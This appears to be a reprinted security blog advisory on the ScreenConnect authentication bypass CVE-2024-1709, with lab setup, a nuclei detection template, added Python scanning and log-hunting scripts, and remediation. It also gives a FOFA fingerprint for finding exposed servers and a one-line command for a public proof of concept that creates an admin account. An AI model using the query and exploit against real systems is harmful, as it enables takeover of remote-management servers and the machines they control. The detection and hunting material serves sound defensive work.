CVE-2024-1709

admin, 2024-02-28 07:46:48, 68 views, 2510 characters, about 8 min 22 s reading time

01 Vulnerability name

ConnectWise ScreenConnect: Authentication Bypass Using an Alternate Path or Channel

02 Affected versions

ConnectWise ScreenConnect 23.9.7 and earlier


03 Vulnerability description

ConnectWise ScreenConnect 23.9.7 and earlier contain an authentication bypass (CWE-288, bypass using an alternate path or channel; CVSS 3.1 base score 10.0). The initial setup wizard, which should be unreachable once the server has been set up, can still be rendered by requesting it with an extra path segment appended (/SetupWizard.aspx/<anything>, the same path the verification template later in this post sends). An unauthenticated attacker can use the wizard to create a new user with administrative rights, log in to the product's administration backend with it, and then use ScreenConnect's ordinary remote-management features to run operating system commands on managed machines, giving direct access to confidential information or critical systems.

For a detailed analysis of the bug, see

https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass

04 FOFA search query

icon_hash="-82958153"


05 Lab setup

Download the installer for your operating system from the official release archive:

https://screenconnect.connectwise.com/download/archive


I installed on CentOS: upload the package, extract it, and change into the install directory (the extraction and cd commands are two separate steps):

tar -zxvf ScreenConnect_20.3.31734.7751_Release.tar.gz
cd ScreenConnect_20.3.31734.7751_Install

Run the install script:


./install.sh


Open the Host page in a browser:

http://localhost:8040/Host


Then request a free trial license on the ConnectWise site and apply it.

06 Batch verification POC

The nuclei template (from the nuclei-templates project) is as follows. It sends one GET to /SetupWizard.aspx/<random string> and reports a hit only when the response is HTTP 200 and the body contains both setup-wizard markers; the Server header is extracted for reference.

id: CVE-2024-1709

info:
  name: ConnectWise ScreenConnect 23.9.7 - Authentication Bypass
  author: johnk3r
  severity: critical
  description: |
    ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.
  reference:
    - https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
    - https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc
    - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1709
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2024-1709
    cwe-id: CWE-288
  metadata:
    verified: true
    max-request: 1
    vendor: connectwise
    product: screenconnect
    shodan-query: http.favicon.hash:-82958153
  tags: cve,cve2024,screenconnect,connectwise,auth-bypass,kev

variables:
  string: "{{rand_text_alpha(10)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/SetupWizard.aspx/{{string}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "SetupWizardPage"
          - "ContentPanel SetupWizard"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: kval
        part: header
        kval:
          - Server
# digest: 4a0a004730450220564c9949c406c35520203b46a2a34bba505d1cadfde47e8a38f9a073264e97f0022100ff2a065d66fa48b8502a068445d833e6700efd1e9715d034f1ea16e91696bd06:922c64590222798bb761d5b6d8e72950

Run the POC against a target list (one base URL per line):

nuclei.exe -l data/CVE-2024-1709.txt -t mypoc/cve/CVE-2024-1709.yaml
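The following is an added Python example, not code from the original post or from the nuclei-templates project, that scripts the same check the template above performs and that the description in section 03 explains: one GET to /SetupWizard.aspx/<random letters>, a hit only when the status is 200 and both body markers are present, plus the Server header. The helper names, the batch wrapper, the constructed sample body and the Server-header version parsing (which assumes a header of the form ScreenConnect/<version>, something not every deployment exposes) are this example's own assumptions.

```python
"""Scripted equivalent of the nuclei check for CVE-2024-1709.

Added example; not code from the original post or from nuclei-templates.
The probe path, the two body markers and the HTTP 200 requirement come from
the template above. Helper names and the Server-header version parsing are
assumptions of this example.
"""
import random
import re
import string
import urllib.error
import urllib.request
from typing import Iterable, Optional

FIXED_VERSION = (23, 9, 8)  # first release carrying the fix (vendor bulletin)
BODY_MARKERS = ("SetupWizardPage", "ContentPanel SetupWizard")

# Constructed response body carrying both template markers (for offline tests).
SAMPLE_WIZARD_BODY = (
    '<html><body class="SetupWizardPage">'
    '<div class="ContentPanel SetupWizard">Welcome to the setup wizard</div>'
    "</body></html>"
)


def probe_path(suffix: Optional[str] = None) -> str:
    """Return the bypass path: SetupWizard.aspx plus one extra path segment.

    The extra segment is what defeats the check that refuses the wizard once
    setup has completed, while the request is still routed to the wizard page.
    """
    if suffix is None:
        suffix = "".join(random.choices(string.ascii_letters, k=10))
    return f"/SetupWizard.aspx/{suffix}"


def get_header(headers, name: str) -> Optional[str]:
    """Case-insensitive header lookup (header-name case varies by server)."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def parse_version(server_header: Optional[str]) -> Optional[tuple]:
    """Parse 'ScreenConnect/23.9.7.8755-...' into (23, 9, 7, 8755).

    Assumption: the version is not always exposed here; return None when the
    header is missing or shaped differently so callers rely on the behavioural
    check instead.
    """
    if not server_header:
        return None
    match = re.search(r"ScreenConnect/(\d+(?:\.\d+)+)", server_header)
    if not match:
        return None
    return tuple(int(part) for part in match.group(1).split("."))


def version_is_fixed(version: Optional[tuple]) -> Optional[bool]:
    """True if version >= 23.9.8, False if older, None if unknown."""
    if version is None:
        return None
    return version >= FIXED_VERSION


def classify(status: int, body: str, headers) -> dict:
    """Apply the template's matchers: status 200 AND both body markers."""
    wizard_served = status == 200 and all(marker in body for marker in BODY_MARKERS)
    server = get_header(headers, "Server")
    version = parse_version(server)
    return {
        "vulnerable": wizard_served,
        "server": server,
        "version": version,
        "version_fixed": version_is_fixed(version),
    }


def check_target(base_url: str, timeout: float = 10.0) -> dict:
    """Send one GET to the probe path and classify the response."""
    url = base_url.rstrip("/") + probe_path()
    request = urllib.request.Request(url, headers={"User-Agent": "cve-2024-1709-check"})
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            status = response.status
            body = response.read().decode("utf-8", "replace")
            headers = response.headers
    except urllib.error.HTTPError as err:  # 4xx/5xx still carry a body and headers
        status, body, headers = err.code, err.read().decode("utf-8", "replace"), err.headers
    result = classify(status, body, headers)
    result["url"] = url
    return result


def check_many(targets: Iterable[str]) -> list:
    """Batch mode, like `nuclei -l`: one result per non-empty target line."""
    results = []
    for target in targets:
        target = target.strip()
        if not target or target.startswith("#"):
            continue
        try:
            results.append(check_target(target))
        except (urllib.error.URLError, OSError) as exc:
            results.append({"url": target, "error": str(exc)})
    return results


if __name__ == "__main__":
    import sys
    for item in check_many(sys.argv[1:]):
        print(item)
```

Run it as `python check.py http://localhost:8040` against the lab instance; a result with `vulnerable: True` means the wizard page was rendered past setup. Treat `version_fixed: None` as "unknown" rather than "safe": the behavioural probe is the authoritative signal, the version field is only a convenience when the header happens to carry it.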


07 Exploitation

A Python PoC on GitHub (watchTowr Labs) adds a user through the bypass:

https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc

Usage:

python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the administration backend with it; from there ScreenConnect's built-in remote-management features can be used to execute system commands.


08 Remediation

Upgrade to version 23.9.8 or later, which contains the fix. Upgrading closes the bypass but does not remove any account an attacker has already created, so also review the instance's user list for accounts you did not add and check the web-server access logs for requests to the setup wizard with a trailing path segment.

https://screenconnect.connectwise.com/download
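For the log review that should accompany the upgrade, here is an added Python example, not from the original post or from ConnectWise, that scans web-server access logs for the request shape the PoC and the nuclei template use: SetupWizard.aspx followed by an extra path segment. The log lines are constructed in W3C extended (IIS-style) format, and the field names, verdict wording and helper names are this example's own assumptions; adapt the #Fields header to whatever your server writes.

```python
"""Hunt for CVE-2024-1709 exploitation attempts in web-server access logs.

Added example; not from the original post or from ConnectWise. The indicator
is the request shape used by the PoC and the nuclei template: SetupWizard.aspx
with an extra path segment. SAMPLE_LOG is constructed (W3C extended, IIS-style)
and the verdict wording is this example's own.
"""
import re
from typing import Dict, Iterable, List

# Constructed sample log, not real traffic: a legitimate visit, a refused plain
# wizard request, a successful probe followed by the wizard form POST (the
# submission that creates the user), and a case/traversal variant that must
# still be caught.
SAMPLE_LOG = """\
#Software: constructed sample
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-02-21 10:02:11 198.51.100.7 GET /Host 200
2024-02-21 10:02:13 198.51.100.7 GET /SetupWizard.aspx 403
2024-02-21 10:03:40 203.0.113.9 GET /SetupWizard.aspx/kFjZtQwPxa 200
2024-02-21 10:03:41 203.0.113.9 POST /SetupWizard.aspx/kFjZtQwPxa 302
2024-02-21 10:03:55 203.0.113.9 GET /Host 200
2024-02-21 10:04:02 192.0.2.20 GET /setupwizard.aspx/../Host 200
"""

# Case-insensitive so a probe that changes the case of the page name is not missed.
BYPASS_RE = re.compile(r"^/setupwizard\.aspx/.+", re.IGNORECASE)


def parse_w3c(lines: Iterable[str]) -> Iterable[Dict[str, str]]:
    """Yield one dict per entry, keyed by the names in the latest #Fields header."""
    fields: List[str] = []
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed or truncated entry; skip rather than misalign columns
        yield dict(zip(fields, parts))


def hunt(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return every entry whose URI matches the bypass shape, with a verdict."""
    hits = []
    for entry in parse_w3c(lines):
        uri = entry.get("cs-uri-stem", "")
        if not BYPASS_RE.match(uri):
            continue
        method = entry.get("cs-method", "").upper()
        status = entry.get("sc-status", "")
        if method == "POST":
            verdict = "wizard form submitted (possible user creation)"
        elif status == "200":
            verdict = "wizard page served (probe succeeded)"
        else:
            verdict = "probe attempted"
        hits.append({
            "time": f"{entry.get('date', '')} {entry.get('time', '')}".strip(),
            "ip": entry.get("c-ip", ""),
            "method": method,
            "uri": uri,
            "status": status,
            "verdict": verdict,
        })
    return hits


def suspicious_sources(hits: List[Dict[str, str]]) -> List[str]:
    """Distinct client addresses behind the hits, for blocking or pivoting."""
    return sorted({hit["ip"] for hit in hits})


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            found = hunt(fh)
    else:
        found = hunt(SAMPLE_LOG.splitlines())
    for hit in found:
        print(hit)
    print("sources:", suspicious_sources(found))
```

A plain request for /SetupWizard.aspx is deliberately not flagged: on a completed installation it is refused, and it is noisy. A GET to the suffixed path that returned 200 means the wizard was rendered for that client; a POST to the same path is the form submission and should be treated as a likely account creation until the user list proves otherwise.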

Originally published on the WeChat public account "AI与网安": CVE-2024-1709

Reprints must keep this link (CN-SEC 中文网, with thanks to the original author): https://cn-sec.com/archives/2532176.html
